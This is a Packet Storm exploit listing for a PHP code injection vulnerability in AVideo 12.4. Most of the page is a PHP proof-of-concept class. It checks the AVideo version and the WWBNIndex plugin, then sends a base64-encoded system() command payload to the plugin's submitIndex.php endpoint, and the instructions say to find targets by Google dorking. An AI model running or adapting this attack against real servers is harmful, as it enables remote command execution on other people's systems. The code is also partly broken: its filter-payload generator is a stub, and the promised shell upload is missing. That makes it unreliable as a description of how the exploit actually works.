Security
Headlines
HeadlinesLatestCVEs

Headline

AVideo 12.4 Code Injection

AVideo version 12.4 suffers from a PHP code injection vulnerability.

Packet Storm
#vulnerability#windows#google#git#php#auth#firefox
=============================================================================================================================================| # Title     : AVideo 12.4 php code injection Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://github.com/WWBN/AVideo/tree/master                                                                                  |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] The following php code Upload shell file from external link.[+] Line 114 set your target.[+] Line 115 set your commands.[+] save code as poc.php .[+] USage : cmd = php poc.php .[+] PayLoad :<?phpclass indoushka{    private $target_uri;    private $payload;    public function __construct($target_uri, $payload)    {        $this->target_uri = $target_uri;        $this->payload = $payload;    }    public function exploit()    {        // إعداد الحمولة        $php_code = "<?php " . ($this->isArchPHP() ? $this->payload : "system(base64_decode('" . base64_encode($this->payload) . "'));") . " ?>";        $filter_payload = $this->generatePhpFilterPayload($php_code);        // إرسال الطلب        $data = http_build_query(['systemRootPath' => $filter_payload]);        $response = $this->sendRequest('POST', '/plugin/WWBNIndex/submitIndex.php', $data);        if ($response['code'] !== 200) {            echo "Server returned " . $response['code'] . ". Successful exploit attempts should not return a response.\n";        }    }    public function check()    {        $response = $this->sendRequest('GET', '/index.php');        if (!$response) {            return 'Failed to connect to the target.';        }        if ($response['code'] !== 200) {            return "Unexpected HTTP response code: " . $response['code'];        }        preg_match('/Powered by AVideo ® Platform v([\d.]+)/', $response['body'], $version_match);        preg_match('/<!--.*?v:([\d.]+).*?-->/m', $response['body'], $version_match);        if (empty($version_match[1])) {            return 'Unable to extract AVideo version.';        }        $version = $version_match[1];        $plugin_check = $this->sendRequest('GET', '/plugin/WWBNIndex/submitIndex.php');        if ($plugin_check['code'] !== 200) {            return 'Vulnerable plugin WWBNIndex was not detected';        }        if (version_compare($version, '12.4') >= 0 && version_compare($version, '14.2') <= 0) {            return "Detected vulnerable AVideo version: {$version}, with vulnerable plugin WWBNIndex running.";        }        return "Detected non-vulnerable AVideo version: {$version}";    }    private function sendRequest($method, $uri, $data = null)    {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $this->target_uri . $uri);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);        if ($method === 'POST') {            curl_setopt($ch, CURLOPT_POST, true);            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        }        $response = curl_exec($ch);        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);        curl_close($ch);        return ['code' => $http_code, 'body' => $response];    }    private function isArchPHP()    {        // افترض أن الحمولة عبارة عن كود PHP        return true; // أو تحقق من ذلك بناءً على شروط معينة    }    private function generatePhpFilterPayload($php_code)    {        // يجب أن تضيف هنا منطق إعداد الحمولة (تصفية)        return $php_code; // قم بتعديل ذلك بناءً على متطلباتك    }}// مثال على كيفية الاستخدام:$target_uri = "http://target-url.com"; // أدخل عنوان الهدف هنا$payload = "<?php echo 'Hello World!'; ?>"; // الحمولة المراد استخدامها$indoushka = new indoushka($target_uri, $payload);$check_result = $indoushka->check();echo $check_result . "\n";$indoushka->exploit();?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Packet Storm: Latest News

Scapy Packet Manipulation Tool 2.6.1